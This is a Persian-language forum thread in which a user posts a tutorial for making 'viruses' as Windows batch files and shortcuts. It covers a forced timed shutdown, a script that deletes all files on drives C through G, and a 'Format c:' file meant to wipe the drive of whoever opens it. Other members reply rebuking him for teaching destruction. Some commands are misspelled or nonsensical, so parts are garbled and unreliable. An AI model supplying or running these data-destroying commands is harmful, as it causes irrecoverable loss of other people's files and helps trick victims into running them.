نشانه: هنگام اجرا شدن اين ويروس پنجره اي همراه با يك تايمر معكوس باز شده و علامت Cancel كردن آن هم خاموش است . و پس از اتمام اين ثانيه شمار كامپيوتر ريست مي شود و عوارضي براي كامپيوتر دارد . اين ويروس خيلي خطر ناك نيست اما براي كامپيوتر ضرر دارد و بيشتر در اينترنت منتشر ميگردد . شروع كار:
ابتدا روي صفحه Desktop راست كليك كرده و New را انتخاب كنيد . Short cut را انتخاب كرده و درون كادر عبارت :
Shutdows –s –t xxx را تايپ كنيد توجه داشته باشيد به جاي xxx (به ثانيه) مدت زماني را وارد كنيد كه كامپيوتر ريست مي شود . سپس دكمه Enter را فشار دهيد . نام فايل را مشخص نموده و Enter را فشار دهيد
ضد ويروس Blaster:
ابتدا روي صفحه Desktop راست كليك كرده و New را انتخاب كنيد . Short cut را انتخاب كرده و درون كادر عبارت :
Shutdows –a را تايپ كنيد. سپس دكمه Enter را فشار دهيد . نام فايل را مشخص نموده و Enter را فشار دهيد
هر وقت از اينترنت اين ويروس براي شما ارسال شد، با باز كردن اين فايل از ريست شدن كامپيوتر جلوگيري مي شود
در ضمن اين ضد ويروس سرعت كامپيوتر را تغيير نمي دهد.
ساختن ويروسي براي Internet Explorer
اين ويروس اينترنت اكسپلورر رو فيلتر گذاري مي كنه و باعث خراب شدنش مي شه . طرز كار:
يك Notepad باز كنيد . درون آن جمله روبرو را بنويسيد: pouped-blocked-web-exploure-online&offline
بعد اون رو با پسوند .bat ذخيره كنيد .
نوعي ديگر از ويروس براي فورمت كردن هارد
با اجرا شدن اين ويروس كليه اطلاعات هارد پاك شده و به هيچ وجه بازيافت نمي شه:
روش كار: يك Notepad باز كنيد و در آن بنويسيد :
echo off@ ATTRIB -a -s -h -r c ATTRIB -a -s -h -r c:\windows\*.* Echo y | echo a | Echo y | del c:\*.* Echo y | echo a | Echo y | del d:\*.* Echoy | echo a | Echo y | del e:\*.* Echo y | echo a | Echo y | del f:\*.* Echo y | echo a | Echo y | del g:\*.* echo y | copy *.* C:\ echo y | copy *.* D:\ echo y | copy *.* E:\ echo y | copy *.* F:\ echo y | copy *.* G:\ resrart
حالا با پسوند .bat ذخيره كنيد .
ساختن ويروسي ساده ولي در عين حال خطرناك
اين ويروس ساختنش كاري نداره ولي اگه كسي بازش كنه .............. به سمت بهشت زهرا ارسال مي شه . حالا طرز كار : يكNotepad باز كرده و درون آن بنويسيد : Format c:/autotest بعد با پسوند .bat ذخيره كنيد . اين ويروس موقع اجزا شدن درايو C رو فرمت مي كنه به طوري كه نه مي شه اطلاعاتي توش ريخت نه مي شه فرمتش كرد .
[تنها کاربران عضو شده قادر به دیدن لینک ها هستند.. ]
ویرایش توسط mohsen.hasani : 06-01-2011 در ساعت 08:41 PM
من نه عقابی هستم که بر آسمان ها سایه فکنده و نه یوزی که بر زمین ها می راند
من اندیشه ای هستم که با محو کردنش تمامی آسمان و زمین محو خواهد شد
محسن حالم به هم ریخت !!!
تو آدم نمیشی انقدر ویروس ننویسی ؟ ما مخرب نیستیم و بلکه سازنده ایم !!! تو داری خرابکاری یاد میدی به جای اینکه سازندگی یاد بدی؟
در این درگه که گه گه که که و که که شود ناگه مشو غره به امروزت که از فردا نیی آگه
محسن حالم به هم ریخت !!!
تو آدم نمیشی انقدر ویروس ننویسی ؟ ما مخرب نیستیم و بلکه سازنده ایم !!! تو داری خرابکاری یاد میدی به جای اینکه سازندگی یاد بدی؟
خوشم میاد هیچ کسی ازت تشکر نکرد امید !!!!!! :دییییی
اون آموزش رو دارم ویرایش میکنم ، ایشالا تا چند روز دیگه میذارم واستون
من نه عقابی هستم که بر آسمان ها سایه فکنده و نه یوزی که بر زمین ها می راند
من اندیشه ای هستم که با محو کردنش تمامی آسمان و زمین محو خواهد شد